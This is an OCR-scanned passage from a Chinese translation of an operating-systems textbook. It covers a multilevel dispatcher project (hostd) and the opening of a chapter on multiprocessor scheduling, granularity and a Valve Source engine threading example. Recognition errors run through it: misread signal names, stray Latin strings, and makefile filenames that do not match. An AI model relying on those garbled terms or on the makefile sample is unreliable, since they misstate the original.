要 的 处 理 器 时 间 (单位 为 秒 )、 内 存 块 的 大 小 以 及 其 他 的 资源 。 

2) 当 进 程 已 经 到 达 并 且 得 到 了 所 有 需要 的 资源 时 ， 进 程 就 可 以 “准备 运行 ”了 。 

3) 未 完成 的 任何 作业 都 是 基于 先 来 先 服务 来 提交 执行 的 。 

4) 如 果 一 个 优先 级 较 低 的 用 户 进程 能 够 得 到 所 需 的 资源 和 内 存 ， 进程 就 会 被 传递 到 反馈 的 调度 程序 

单元 适当 的 优先 级 队列 ， 同 时 剩余 的 资源 指示 器 得 到 更 新 。 


5) 当 作业 被 启动 (fork 和 exec ("process", ...)) 时 ,在 执行 exec 之 前 ， 调 度 程序 将 显示 
作业 的 参数 (进程 ID、 优 先 级 、 剩余 的 处 理 器 时 间 (单位 为 秒 )、 分 配 的 内 存 以 及 块 的 大 小 、 请 求 
的 资源 )。 


6) 实时 进程 允许 一 直 运 行 到 调度 程序 通过 一 个 SIGINT 信和 号 来 杀 死 它 为 止 。 
7) 一 个 低 优先 级 的 用 户 作业 在 被 阻塞 ( sr@TsTP ) 或 者 由 于 时 间 片 到 而 被 终止 (SIGINT) 之 前 允许 
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运行 一 个 调度 程序 的 时 间 单 元 。 如 果 被 阻塞 ， 它 的 优先 级 级 别 会 被 降低 ( 如 果 可 能 ) 并 且 进 程 就 
会 像 图 P2.1 和 图 P2.3 显示 的 那样 重新 选择 适当 的 优先 级 队列 。 为 了 维持 调度 程序 和 子 进程 输出 的 
同步 ， 调 度 程序 应 该 在 继续 运行 之 前 等 待 进程 对 sIGTSTP 或 SIGINT 信号 做 出 回应 
(waitpid(p->pid, &status, WUNTRACED) )。 为 了 与 调度 策略 比较 (IÆ 9.5 ) 指示 的 性 能 
序列 相 匹配 ， 除 非 另 一 个 进程 正在 等 待 着 被 启动 或 者 重新 被 启动 ， 否 则 用 户 作 业 不 应 该 被 终止 并 
且 移 到 相对 较 低 的 优先 级 级 别 。 

8) 假定 没有 更 高 优先 级 的 实时 作业 在 提交 队列 中 、 那 么 在 反馈 队列 中 有 最 高 优先 级 的 未 决 进程 将 会 
被 启动 或 者 重新 启动 ( SIGCONT ). 

9) 当 一 个 进程 被 终止 后 ， 它 占有 的 资源 将 会 返回 给 调度 程序 ， 从 而 可 以 重新 分 配给 未 来 的 进程 。 

10) 当 调 度 列 表 内 输入 队列 中 以 及 反馈 队列 中 都 没有 进程 的 时 候 ， 调 度 程 序 终止 。 


调度 列表 


调度 列表 是 要 被 调度 程序 处 理 的 进程 的 列表 .。 这 个 列表 包含 在 文本 文件 中 并 且 通 过 命令 行 来 指定 , 例如 ， 

>hostd dispatchlist 

列表 的 每 一 行 用 下 面 的 数据 〈 用 逗号 分 隔 ) 来 描述 进程 : 

< arrival time >, < priority >, < processor time >, < Mbytes >, 

<# printers >, <#scanners>, <#modems>, < # CDs > 

因而 ， 

12, 0, 1, 64, 0, 0, 0, 0 

12, 1, 2, 128, 1, 0, 0, 1 

13, 3, 6, 128, 1, 0, 1, 2 

的 含义 是 : 

第 一 个 作业 : 达到 时 间 12， 优 先 级 0 ( 实时 )， 需 要 1 秒 钟 的 处 理 器 时 间 以 及 64MB 内 存 , 没有 IO 资 
源 要 求 。 

第 二 个 作业 : 到 达 时 间 12， 优 先 级 1 ( 高 优先 级 的 用 户 作 业 )， 需 要 2 秒 钟 的 处 理 器 时 间 ，128MB 内 
存 ，! 台 打 印 机 和 1 个 CD 驱动 。 
. 第 三 个 作业 : 到 达 时 间 13, 优先 级 3 ( 优先 级 最 低 的 用 户 作 业 )， 需 要 6 秒 的 处 理 器 时 间 ，128MB 内 
存 ，! 台 打印 机 ，1 台 调 制 解 调 器 以 及 2 个 CD 驱动 。 

提交 的 文本 文件 可 以 是 任意 长 度 的 , 可 以 包含 1000 个 作业 。 通 过 文件 结束 标记 , 提交 将 在 最 后 一 行 结束 。 

练习 中 描述 了 用 来 测试 调度 程序 的 单个 特征 操作 的 调度 程序 输入 列表 。 注 意 ， 这 些 列表 将 最 终 形成 测试 的 基 
础 ， 在 评分 的 过 程 中 调度 程序 会 用 到 这 些 测 试 。 希 望 能 在 练习 中 根据 描述 完成 练习 。 

当然 ， 自 己 提交 的 调度 程序 将 会 用 到 更 多 更 复杂 的 组 合 来 测试 。 

在 课程 中 将 会 给 出 一 个 具有 完整 功能 调度 程序 的 实例 。 如 果 对 操作 方式 和 输出 格式 有 任何 疑问 ， 就 应 
该 使 用 这 个 程序 来 观测 调度 程序 所 期 待 的 输出 。 


项 目 要 求 : 


1. 设计 一 个 能 够 满足 上 述 要 求 的 调度 程序 ， 一 个 正式 的 设计 文档 包括 : 
a ) 描述 和 讨论 所 使 用 的 内 存 分 配 算法 并 且 评 判 最 终 的 选择 。 
b) 描述 和 讨论 为 了 排队 、 调 度 、 分 配 内 存 和 其 他 资源 ， 调 度 程序 所 使 用 的 数据 结构 。 
c) 描述 和 评判 程序 的 总 体 结构 ， 描 述 各 个 模块 和 主要 函数 〈 希望 能 描述 函数 的 “接口 ”)。 
d) 与 “实际 ”的 操作 系统 相 比 较 ， 讨 论 为 什么 采用 这 个 多 级 调度 方案 。 举 出 这 个 方案 的 缺点 ， 提 
出 可 能 的 改进 。 在 讨论 中 还 应 该 包含 内 存 和 资源 分 配方 案 。 
正式 的 设计 文档 要 包含 深入 的 讨论 、 描 述 及 论证 。 设 计 文 档 要 单独 提交 纸 质 版 ， 不 要 在 里 面包 含 任何 
源 代码 。 
2. 使 用 C 语言 来 实现 这 个 调度 程序 。 
3. MUST 的 源 代 码 应 该 采用 适当 的 结构 并 且 加 上 足够 的 注释 , 以 保证 别人 能 够 理解 并 容易 地 维护 这 段 
代码 。 
4. 在 截止 日 期 之 前 ， 必 须 提供 提交 过 程 的 细节 。 
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5. 提交 必须 仅 包含 源 代码 文件 、 包 含 文件 以 及 makefile 文件 。 可 执行 程序 无 需 包 含 。 评 分 程序 将 
会 根据 提供 的 代码 自动 地 重新 构造 程序 。 如 果 提 交 的 代码 不 能 够 编译 ， 将 不 能 被 评分 。 

6. makefile 文件 应 该 生成 二 进 制 的 可 执行 文件 hosta ( 都 是 小 写字 母 )。 下面 是 一 个 makefile 的 
例子 : 

#Joe Citizen, 81234567 -Operating Systems Project 2 

#CompLab1/01 tutor:Fred Bloggs 

hostd:hostd.c utility.c hostd.h 

gcc host.c utility.c -o hostd 

通过 在 命令 行 提示 符 下 键 人 make 来 生成 hostd 程序 。 注意, 在 上 面 的 makefile H, 第 四 行 必须 以 

一 个 制 表 符 开始 。 


交付 


1. 源码 文件 、 包 含 文件 以 及 makefile. 
2.“ 工 程 要 求 ”一 节 中 列举 出 的 设计 文档 。 


代码 提交 


要 求 包含 makefile。 所 有 的 文件 应 该 被 复制 到 同一 个 文件 夹 下 : 因此 ， 在 makefile 中 不 需要 任何 
BE, makefile 应 该 包含 构造 程序 所 需 的 所 有 依赖 关系 。 如 果 包 含 一 个 库 makefile 也 应 该 构造 这 个 
库 。 

为 了 清楚 起 见 ， 不 要 提交 任何 的 二 进 制 或 者 对 象 文 件 。 需 要 的 是 源码 和 makefile。 通 过 将 源码 复制 
到 一 个 空 文件 夹 下 并 且 通 过 makefile 来 编译 这 个 程序 ， 从 而 测试 这 个 工程 。 

评分 程序 将 使 用 一 个 shell 脚本 ， 这 个 脚本 将 提交 的 文件 复制 到 测试 文件 夹 下 ， 执 行 make 命令 ， 然 后 
通过 使 用 标准 的 测试 文件 集 来 测试 提交 的 调度 程序 。 如 果 由 于 名 字 错 误 、 名 字 中 错误 的 大 小 写 、 导 致 编译 
不 通过 的 错误 源码 版 本 、 文 件 不 存在 等 原因 导致 执行 序列 不 能 通过 。 那 么 评分 序列 也 会 终止 。 在 这 种 情况 
下 ， 只 有 源码 和 设计 文档 能 够 得 分 。 


第 10 章 多 处 理 器 和 实时 调度 


本 章 继续 讲述 进程 和 线程 调度 。 首 先 分 析 使 用 多 个 处 理 器 可 能 带 来 的 问题 ， 并 探讨 一 些 设 
计 方 面 的 问题 , 接 下 来 讨论 多 处 理 器 系统 中 的 进程 调度 ,然后 分 析 多 处 理 器 线程 调度 中 不 同 的 
设计 考虑 。 本 章 的 第 二 节 讲 述 实 时 调度 ,首先 讨论 了 实时 进程 的 特点 ,然后 分 析 线 程 调度 的 本 
E, 并 分 析 两 种 实时 调度 方法 : 限时 调度 ( deadline scheduling ) 和 速率 单调 调度 (rate monotonic 
scheduling )。 


10.1 多 处 理 器 调度 


当 一 个 计算 机 系统 包含 多 个 处 理 器 时 , 在 设计 调度 功能 时 就 会 产生 一 些 新 问题 。 本 节 首 先 给 
出 关于 多 处 理 器 的 简单 概述 ， 然 后 分 析 设 计 进 程 级 调度 和 线程 级 调度 时 的 不 同 考 虑 。 

多 处 理 器 系统 可 以 划分 为 以 下 几 类 : 

© HRA. SARZE, SH: 由 一 系列 相对 自治 的 系统 组 成 ， 每 个 处 理 器 有 自己 的 
AFA VO 通道 。 我 们 将 在 第 16 章 讲述 这 种 类 型 的 配置 。 

@ 专门 功能 的 处 理 器 : IO 处 理 器 就 是 一 个 典型 的 例子 。 在 这 种 情况 下 ， 有 一 个 通用 的 主 处 
理 器 ， 专 用 处 理 器 受 主 处理 器 的 控制 ， 并 给 主 处 理 器 提供 服务 。 有 关 VO 处 理 器 的 问题 
将 在 第 11 章 讲 述 。 

@ 紧 看 合 多 处 理 : 由 一 系列 共享 同一 个 内 存 并 在 操作 系统 完全 控制 下 的 处 理 器 组 成 。 

本 节 所 关注 的 是 最 后 一 类 系统 ， 特 别 是 与 调度 有 关 的 问题 。 


10.1.1 粒度 


一 种 描述 多 处 理 器 并 把 它们 和 其 他 结构 放置 在 一 个 上 下 文 环 境 中 的 一 种 比较 好 的 方法 是 , 考 
虑 系统 中 进程 之 间 的 同步 粒度 ， 或 者 说 同步 频率 。 我 们 可 以 根据 粒度 的 不 同 来 区 分 5 类 并 行 度 ， 
如 表 10.1 所 示 ( 表 10.1 KT [CEHR87] 和 [ WOOD89 ])。 


表 10.1 同步 粒度 和 进程 





粒度 大 小 说 明 同步 间隔 〈 指 令 ) 

细 单 指令 流 中 国有 的 并 行 <20 

中 等 在 一 个 单独 应 用 中 的 并 行 处 理 或 多 任务 处 理 20~200 

粗 在 多 道 程序 环境 中 并 发 进程 的 多 处 理 200~2000 

非常 粗 在 网 络 节 点 上 进行 分 布 处 理 , 以 形成 一 个 计算 环境 2000~1M 

RAK 多 个 无 关 进 程 不 适用 
无 约束 并 行 性 


对 于 无 约束 并 行 性 (independent parallelism )， 进 程 间 没有 显 式 的 同步 。 每 个 进程 都 代表 独 
立 的 应 用 或 作业 。 这 类 并 行 性 的 一 个 典型 应 用 是 分 时 系统 。 每 个 用 户 都 执行 一 个 特定 的 应 用 ,如 
字 处 理 或 使 用 电子 表格 。 多 处 理 器 像 多 道 程序 单 处理 器 一 样 提供 相同 的 服务 。 由 于 有 多 个 处 理 器 
可 用 ， 因 而 用 户 的 平均 响应 时 间 非 常 短 。 

无 约束 并 行 有 可 能 达到 这 样 的 性 能 , 每 个 用 户 都 如 同 在 使 用 个 人 计算 机 或 工作 站 。 如 果 任 何 
一 个 文件 或 信息 被 共享 , 则 单个 系统 必须 连接 在 一 个 有 网 络 支持 的 分 布 式 系统 中 。 这 种 方法 将 在 
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第 16 章 中 介绍 。 另 一 方面 ， 在 许多 实例 中 ， 多 处 理 器 共享 系统 比分 布 式 系统 的 成 本 效益 更 高 ， 
它 允 许 节 约 使 用 磁盘 和 其 他 外 围 设 备 。 


粗 粒 度 和 非常 粗 粒度 并 行 性 

HAE (coarse) 和 非常 粗 粒 度 (very coarse) 的 并 行 ， 是 指 在 进程 之 间 存 在 着 同步 ， 但 是 
在 一 个 非常 粗 的 级 别 上 。 这 种 情况 可 以 简单 地 处 理 成 一 组 运行 在 多 道 程序 单 处 理 器 上 的 并 发 进 
程 ， 在 多 处 理 器 上 对 用 户 软件 进行 很 少 的 改动 或 者 不 进行 改动 就 可 以 提供 支持 。 

[ WOOD89 ] 中 给 出 了 一 个 简单 的 可 以 开发 多 处 理 器 存在 的 应 用 例子 。 作者 开发 了 一 个 程序 ， 
根据 需要 重新 编译 文件 的 规范 说 明 来 重新 构造 一 部 分 软件 , 并 确定 哪些 编译 ( 通常 是 所 有 ) 可 以 
同时 运行 。 然 后 程序 为 每 一 个 并 行 的 编译 产生 一 个 进程 。 作 者 指出 , 在 多 处 理 器 上 的 加 速 比 实际 
上 超过 了 仅仅 增加 使 用 的 处 理 器 数目 所 期 待 的 加 速 比 ， 这 是 由 于 磁盘 高 速 缓存 ( 详 见 第 11 章 ) 
和 编译 代码 共享 的 协作 结果 ， 而 这 些 只 需要 一 次 性 地 载 人 内 存 。 

一 般 而 言 , 使 用 多 处 理 器 体系 结构 ,对 所 有 需要 通信 或 同步 的 并 发 进程 集合 都 有 好 处 。 当 进 
程 间 的 交互 不 是 很 频繁 的 时 候 ， 分 布 式 系统 可 以 提供 较 好 的 支持 。 但 是 ， 当 交互 更 加 频繁 时 ， 分 
布 式 系统 中 的 网 络 通信 开销 会 抵消 一 部 分 潜在 的 加 速 比 , 在 这 种 情况 下 , 多 处 理 器 组 织 能 提供 最 
有 效 的 支持 。 


中 等 粒度 并 行 性 

第 4 章 曾 经 讲述 过 , 应 用 程序 可 以 通过 进程 中 的 一 组 线程 被 有 效 地 实现 。 在 这 种 情况 下 ， 必 
须 由 程序 员 显 式 地 指定 应 用 程序 潜在 的 并 行 性 。 典 型 情况 下 , 为 了 达到 中 等 粒度 并 行 性 ( medium- 
grain) 的 同步 ， 在 应 用 程序 的 线程 之 间 ， 需 要 更 高 程度 的 合作 与 交互 。 

尽管 多 处 理 器 和 多 道 程 序 单 处 理 器 都 支持 独立 、 非 常 粗 和 粗 粒 度 的 并 行 度 , 并 基本 不 会 对 调 
度 功能 产生 影响 , 但 在 处 理 线程 调度 时 , 我 们 仍然 需要 重新 分 析 调度 。 由 于 应 用 程序 中 各 个 线程 
间 的 交互 非常 频繁 , 导致 系统 对 一 个 线程 的 调度 决策 可 能 会 影响 整个 应 用 的 性 能 。 后 面 我 们 将 回 
过 头 来 再 讨论 这 个 问题 。 
细 粒 度 的 并 行 性 

细 粒 度 〈 fine-grain ) 并 行 性 代表 着 比 线程 中 的 并 行 更 加 复杂 的 使 用 情况 。 尽 管 在 高 度 并 行 的 
应 用 中 已 经 完成 了 大 量 的 相关 研究 工作 ,但 迄今 为 止 , 这 仍然 是 一 个 特殊 的 、 被 分 割 的 领域 ， 有 
许多 不 同 的 方法 。 


粒度 示例 : Valve 游戏 软件 


Valve 作为 游戏 界 的 巨头 公司 , 开发 了 Source 引擎 以 及 很 多 脸 炙 人 口 的 游戏 。 前 者 是 现在 使 
用 最 为 广泛 的 游戏 引擎 , 它 作为 动画 引擎 被 Valve 用 在 游戏 开发 中 ，Source 也 被 授权 给 其 他 游戏 
开发 者 使 用 。 
近年 来 ,为 了 充分 利用 Intel 和 AMD 公司 的 多 核 处 理 器 芯片 的 功能 ,Valve 公司 重 写 了 Source 
的 代码 ， 使 得 它 支 持 多 线程 处 理 技术 。“ 多 核 ” 指 在 一 个 芯片 上 放置 多 个 处 理 器 ， 一 般 是 2 个 或 
4 个 。 一 个 SMP 系统 包含 一 个 或 多 个 芯片 ， 使 得 并 行 的 多 线程 操作 成 为 可 能 。 修 改过 的 Source 
引擎 代码 为 Valve 公司 的 游戏 产品 提供 了 更 有 力 的 支持 ， 比 如 《Half Life2》( 半 条 命 2 )。 
在 Valve 公司 看 来 ， 线 程 粒度 选项 可 以 被 定义 成 如 下 几 项 : 
o 粗 粒 度 线程 : 独立 的 模块 , 也 称 为 系统 , 被 分 配 到 单独 的 处 理 器 上 。 以 Source 引擎 为 例 ， 
使 用 粗 粒度 线程 意味 着 一 个 处 理 器 负责 泻 染 , 第 二 个 处 理 器 负责 AL, 第 三 个 处 理 器 负责 
物理 计算 ， 依 此 类 推 。 这 很 好 理解 。 本 质 上 每 个 主要 的 模块 都 是 一 个 单独 的 线程 ， 由 一 
个 时 间 表 线程 来 协调 处 理 所 有 线程 的 同步 。 
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@ 细 粒 度 线程 : 许多 相似 或 相同 的 任务 可 以 由 多 个 处 理 器 同时 处 理 ， 比 如 一 个 遍历 数组 数 
据 的 循环 操作 可 以 切 分 成 多 个 小 循环 ,每 个 循环 都 由 一 个 并 行 的 可 调度 的 独立 线程 执行 。 
@ RARE: 它 采 用 了 可 选择 的 配置 ， 针 对 一 些 系统 使 用 细 粒 度 线程 ， 针 对 另外 一 些 系统 
使 用 粗 粒 度 线程 。 

Valve 公司 发 现 ， 采 用 粗 粒度 线程 ， 可 以 使 双 处 理 器 上 的 执行 性 能 达到 单 处 理 器 的 两 倍 。 但 
是 这 种 提升 幅度 只 有 在 某 种 刻意 创造 的 条 件 下 才能 达到 , 对 于 真实 的 游戏 环境 , 性 能 大 约 能 够 提 
升 为 原来 的 1.2 倍 。Valve 公司 还 发 现 细 粒 度 线程 难以 被 有 效 利 用 。 每 工作 单元 所 耗费 的 时 间 是 
不 断 变化 的 ， 而 且 管理 输出 的 时 间 表 和 结果 会 涉及 很 复杂 的 程序 。 

Valve 公司 发 现 ， 混 合 线程 方法 最 具有 实用 价值 ， 规 模 在 8 个 或 者 16 个 处 理 器 的 多 处 理 技 
术 是 最 优 的 。Valve 公司 识别 出 了 在 单 处 理 器 上 工作 时 最 有 效率 的 一 些 系 统 。 一 个 例子 就 是 混 音 ， 
它 很 少 有 用 户 交 互 ， 不 受 Windows 框架 配置 的 限制 ， 而 且 工 作 在 自己 的 数据 集 上 。 而 其 他 模块 
比如 场景 泻 染 ,可 以 由 多 个 线程 协同 工作 ,因此 该 模块 可 以 在 单 处 理 器 上 工作 , 但 是 当 处 理 器 数 
量变 多 时 ， 性 能 会 变 得 更 好 。 . 

图 10.1 举例 说 明了 泻 染 模块 的 线程 结构 。 在 这 个 层次 化 结构 中 ， 高 层 线程 根据 需要 生成 低 
层 线程 。 这 个 演 染 模块 依赖 Source 引擎 的 一 个 关键 部 分 ， 称 为 世界 列表 ， 它 是 游戏 世界 中 的 虚 
拟 元 素 的 数据 库 表示 。 首先 决定 世界 上 的 哪个 区 域 需 要 被 泻 染 , 接 下 来 决定 场景 中 的 什么 对 象 需 
要 从 多 个 角度 观看 。 然后 是 处 理 器 密集 的 工作 。 这 个 泻 染 模块 必须 产生 每 个 对 象 多 个 视角 演 染 效 
果 ， 比 如 玩家 视角 、 电 视 监 视 器 的 视图 以 及 水 中 倒影 的 视图 。 

下 面 列 出 了 [ LEON07 ] 中 列 出 的 泻 染 模块 线程 策略 的 一 些 关 键 点 : 

@ 并 行 地 为 多 种 场景 构建 场景 泻 染 列表 ( 比如 世界 和 水 中 倒影 )。 

@ 重合 图 形 仿 真 。 

@ 并 行 计算 字体 转换 。 

@ 允许 多 线程 并 行 演 染 。 





场景 列表 
对 每 一 个 对 象 


图 10.1 演 染 模块 的 混合 线程 
设计 者 发 现 简单 地 为 一 个 线程 锁定 关键 数据 库 ( 例如 世界 列表 数据 库 ) 不 是 十 分 有 效 。 线 程 


对 数据 库 的 访问 有 超过 95% 的 时 间 是 读 取 数 据 ， 而 至 多 有 5% 的 时 间 在 向 数据 集中 写 入 数据 。 因 
此 ， 基 于 “ 单 写 者 多 读者 ”的 模型 工作 起 来 更 有 效率 。 


10.1.2 设计 问题 


多 处 理 器 中 的 调度 涉及 三 个 相互 关联 的 问题 : 

@ 把 进程 分 配 到 处 理 器 。 

@ 在 单个 处 理 器 上 使 用 多 道 程 序 设计 。 

@ 一 个 进程 的 实际 分 派 。 

在 讨论 这 三 个 问题 时 ,必须 牢记 所 采用 的 方法 通常 取决 于 应 用 程序 的 粒度 等 级 和 可 用 处 理 器 
的 数目 。 


把 进程 分 内 到 处 理 器 

如 果 假 设 多 处 理 器 的 结构 是 统一 的 , 即 没 有 哪个 处 理 器 在 访问 内 存 和 IO 设备 时 具有 特别 的 
物理 上 的 优势 , 那么 最 简单 的 调度 方法 是 把 处 理 器 看 做 一 个 资源 池 , 并 按照 要 求 把 进程 分 配 到 相 
应 的 处 理 器 。 随 之 而 来 的 问题 是 : 分 配 应 该 是 静态 的 还 是 动态 的 ? 

如 果 一 个 进程 从 被 激活 到 完成 , 一 直 被 分 配给 同一 个 处 理 器 , 那么 就 需要 为 每 个 处 理 器 维护 
一 个 专门 的 短程 队列 。 这 个 方法 的 优点 是 调度 的 开销 比较 小 ,因为 对 所 有 进程 , 关于 处 理 器 的 分 
配 只 进行 一 次 。 同 时 ， 使 用 专用 处 理 器 允许 一 种 称 做 组 调度 的 策略 ， 后 面 将 进行 详细 讲述 。 

静态 分 配 的 缺点 是 一 个 处 理 器 可 能 处 于 空闲 状态 , 这 时 它 的 队列 为 空 ， 而 另 一 个 处 理 器 却 积压 
了 许多 工作 。 为 防止 这 种 情况 发 生 ,需要 使 用 一 个 公共 队列 。 所 有 进程 都 进入 一 个 全 局 队列 ， 然 后 
调度 到 任何 一 个 可 用 的 处 理 嚣 中。 这样， 在 一 个 进程 的 生命 周期 中 , 它 可 以 在 不 同 的 时 间 在 不 同 的 
处 理 器 上 执行 。 在 紧密 耦合 的 共享 存储 器 结构 中 ,所 有 处 理 器 都 可 以 得 到 所 有 进程 的 上 下 文 环境 信 
息 ， 因 此 ， 调 度 进 程 的 开销 与 它 被 调度 到 哪个 处 理 器 无 关 。 另 一 种 分 配 策略 是 动态 负载 平衡 ， 在 该 
策略 中 ， 线 程 可 以 在 不 同 处 理 器 所 对 应 的 队列 之 间 转 移 。Linux 采用 的 就 是 这 种 动态 分 配 策略 。 

不 论 是 否 给 进程 分 配 专用 的 处 理 器 , 都 需要 通过 某 种 方法 把 进程 分 配给 处 理 器 。 可 以 使 用 两 
种 方法 : 主 从 式 和 对 等 式 。 在 主 从 式 结构 中 , 操作 系统 的 主要 核心 功能 总 是 在 某 个 特定 的 处 理 器 
上 运行 , 其 他 处 理 器 可 能 仅仅 用 于 执行 用 户 程序 。 主 处 理 器 负责 调度 作业 。 当 一 个 进程 被 激活 时 ， 
如 果 从 处 理 回 需要 服务 ( 例如 一 次 IO 调用 )， 它 必须 给 主 处 理 器 发 送 一 个 请 求 ， 然 后 等 待 服务 
的 执行 。 这 种 方法 非常 简单 ， 几乎 不 需要 对 单 处 理 器 多 道 程序 操作 系统 进行 增强 。 由 于 处 理 器 拥 
有 对 所 有 存储 器 和 IO 资源 的 控制 , 因而 可 以 简化 冲突 解决 方案 。 这 种 方法 有 两 个 缺点 : 主 处 理 
器 的 失败 导致 整个 系统 失败 ; 主 处 理 器 可 能 成 为 性 能 瓶颈 。 

在 对 等 式 结构 中 , 操作 系统 可 以 在 任何 一 个 处 理 器 中 执行 。 每 个 处 理 器 从 可 用 进程 池 中 进行 
自 调度 。 这 种 方法 增加 了 操作 系统 的 复杂 性 ,操作 系统 必须 确保 两 个 处 理 器 不 会 选择 同一 个 进程 ， 
进程 也 不 会 从 队列 中 丢失 ， 因 此 必须 采用 某 些 技术 来 解决 和 同步 对 资源 的 竞争 请 求 。 

当然 , 在 这 两 个 极端 之 间 还 存在 着 许多 方法 。 可 以 提供 一 个 处 理 器 子 集 , 以 专门 用 于 内 核 处 
H, 而 不 是 只 用 一 个 处 理 器 。 另 一 种 方法 是 基于 优先 级 和 执行 历史 来 简单 地 管理 内 核 进程 和 其 他 
进程 之 间 的 需求 差异 。 


在 单个 处 理 器 上 使 用 多 道 程序 设计 

如 果 每 个 进程 在 其 生命 周期 中 都 被 静态 地 分 配给 一 个 处 理 器 , 就 应 该 考虑 一 个 新 问题 : 该 处 
理 器 支持 多 道 程 序 吗 ? 读者 的 第 一 反应 可 能 是 很 奇怪 为 什么 需要 问 这 样 的 问题 -如 果 把 单个 进程 
与 处 理 器 绑 定 ， 而 该 进程 因为 等 待 VO 或 者 因为 考虑 到 并 发 /同步 而 频繁 地 被 阻塞 ， 则 会 产生 处 
理 器 资源 的 浪费 。 

传统 的 多 处 理 器 处 理 的 是 粗 粒度 或 无 约束 同步 粒度 〈( 见 表 10.1 )， 很 显然 ， 单 个 的 处 理 器 能 
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够 在 许多 进程 间 切 换 ， 以 达到 较 高 的 利用 率 和 更 好 的 性 能 。 但 是 ,对 于 运行 在 有 许多 处 理 器 的 多 
处 理 器 系统 中 的 中 等 粒度 应 用 程序 , 当 多 个 处 理 器 可 用 时 , 要 求 每 个 处 理 器 尽 可 能 地 忙 就 不 再 那 
么 重要 了 。 相 反 , 我 们 更 加 关注 如 何 能 为 应 用 提供 最 好 的 平均 性 能 。 由 许多 线程 组 成 的 一 个 应 用 
程序 的 运行 情况 会 很 差 ， 除 非 所 有 的 线程 都 同时 运行 。 
进程 分 派 

与 多 处 理 器 调度 相关 的 最 后 一 个 设计 问题 是 选择 哪 一 个 进程 运行 。 我 们 已 经 知道 , 在 多 道 程 
序 单 处 理 器 上 , 与 简单 的 先 来 先 服务 策略 相 比较 , 使 用 优先 级 或 者 基于 使 用 历史 的 高 级 调度 算法 
可 以 提高 性 能 。 考 虑 多 处 理 器 时 ， 这 些 复杂 性 可 能 是 不 必要 的 ,还 有 可 能 起 到 相反 的 效果 ,相对 
比较 简单 的 方法 可 能 会 更 有 效 , 而 且 开销 也 比较 低 。 对 于 线程 调度 的 情况 , 会 出 现 比 优先 级 和 执 
行 历史 更 重要 的 新 间 题 。 下 面 将 依次 讨论 这 些 问 题 。 


10.1.3 ”进程 调度 


在 大 多 数 传统 的 多 处 理 器 系统 中 , 进程 并 不 是 被 指定 到 一 个 专门 的 处 理 器 。 不 是 所 有 处 理 器 
只 有 一 个 队列 , 或 者 使 用 某 种 类 型 的 优先 级 方案 , 而 是 有 多 条 基于 优先 级 的 队列 ,并 且 都 送 进 相 
同 的 处 理 器 池 中 。 在 任何 情况 下 ， 都 可 以 把 系统 看 做 是 多 服务 器 排队 结构 。 

考虑 一 个 双 处 理 器 系统 ， 每 个 处 理 器 的 处 理 速率 为 单 处 理 器 系统 中 处 理 器 处 理 速率 的 一 半 。 
[SAUE81 ] 给 出 了 FCFS 调度 、 轮 转 法 和 最 短 剩余 时 间 法 的 比较 ， 这 个 研究 所 关注 的 是 进程 服务 
时 间 。 进 程 服务 时 间 可 以 用 来 度量 整个 作业 所 需要 的 处 理 器 时 间 总 量 , 或 者 该 进程 每 次 准备 使 用 
处 理 器 时 所 需要 的 时 间 总 量 。 对 于 轮转 法 而 言 ， 假 设 时 间 片 的 长 度 比 上 下 文 环 境 切 换 的 开销 大 ， 
而 比 平均 服务 时 间 得， 其 结果 取决 于 服务 时 间 的 变化 。 通 常 这 种 变化 是 用 变化 系数 C, 度 量 的 e 。 
C:=0 对 应 于 没有 变化 的 情况 : 所 有 进程 的 服务 时 间 是 相等 的 。 也 就 是 说 ，C, 的 值 越 大 ， 服 务 时 
间 的 值 的 变化 越 大 。 在 处 理 器 服务 时 间 的 分 配 中 ，C, 的 值 通常 不 会 超过 5。 

图 10.2a 给 出 了 轮转 法 的 吞吐 量 和 了 TCFS 的 吞吐 量 的 比率 ,这 是 关于 G 的 函数 。 注 意 , 在 双 
处 理 器 的 情况 下 ,调度 算法 间 的 差别 很 小 。 对 于 双 处 理 器 ,在 FCFS F, 一 个 需要 长 服务 时 间 的 
进程 很 少 被 中 断 ， 其 他 进程 可 以 使 用 其 他 处 理 器 。 图 10.2b 中 显示 出 了 类 似 的 结果 。 
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变化 系数 变化 系数 
a) RR 与 FCFS 的 比较 b) SRT 与 FCFS 的 比较 


图 10.2 单 处 理 器 和 双 处 理 器 的 调度 性 能 的 比较 
[ SAUE81 ] 中 的 研究 在 各 种 情况 下 重复 进行 这 个 分 析 ， 包 括 关于 多 道 程序 设计 的 程度 的 假 


设 、LO 密集 型 和 CPU 密集 型 的 进程 和 使 用 优先 级 。 得 出 的 一 般 结论 是 , 对 于 双 处 理 器 , 调度 原 
则 的 选择 没有 在 单 处 理 器 中 显得 重要 。 显 然 ， 当 处 理 器 的 数目 增加 时 ,这 个 结论 会 更 加 确定 。 因 


© Cc 的 值 是 由 公式 oT 计算 的 ， 其 中 Gi 是 服务 时 间 的 标准 差 ，T, 是 平均 服务 时 间 。 对 C; 的 进一步 解释 请 参考 网 
dk: WilliamStallings.com/StudentSupport.html 中 的 排队 分 析 讨 论 内 容 。 
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此 ， 在 多 处 理 器 系统 中 使 用 简单 的 FCFS 原则 或 者 在 静态 优先 级 方案 中 使 用 FCFS 就 足够 了 。 
10.14 ”线程 调度 


线程 执行 的 概念 与 进程 中 的 定义 是 不 同 的 。 一 个 应 用 程序 可 以 作为 一 组 线程 来 实现 , 这 些 线 
程 可 以 在 同一 个 地 址 空间 中 协作 和 并 发 地 执行 。 

在 单 处 理 嚣 中， 线程 可 以 用 作 辅 助 构造 程序 ， 并 在 处 理 过 程 中 重 又 执行 7O。 由 于 在 进行 线 
程 切换 时 的 系统 开销 远 远 小 于 进程 切换 的 系统 开销 , 因此 可 以 用 很 少 的 代价 实现 这 些 优点 。 在 多 
处 理 器 系统 中 , 线程 的 全 部 能 力 得 到 了 更 好 的 展现 。 在 这 个 环境 中 , 线程 可 以 用 于 开发 应 用 程序 
中 真正 的 并 行 性 。 如 果 一 个 应 用 程序 的 各 个 线程 同时 在 各 个 独立 的 处 理 器 中 执行 , 其 性 能 就 会 得 
到 显著 的 提高 。 但 是 ， 对 于 在 线程 间 需 要 交互 的 应 用 程序 ( 中 等 粒度 的 并 行 度 )， 线 程 管理 和 调 
度 中 很 小 的 变化 就 会 对 性 能 产生 重大 的 影响 [ ANDE89 ]。 

在 多 处 理 器 线程 调度 和 处 理 器 分 配 的 各 种 方案 中 ， 有 4 种 比较 突出 的 方法 : 

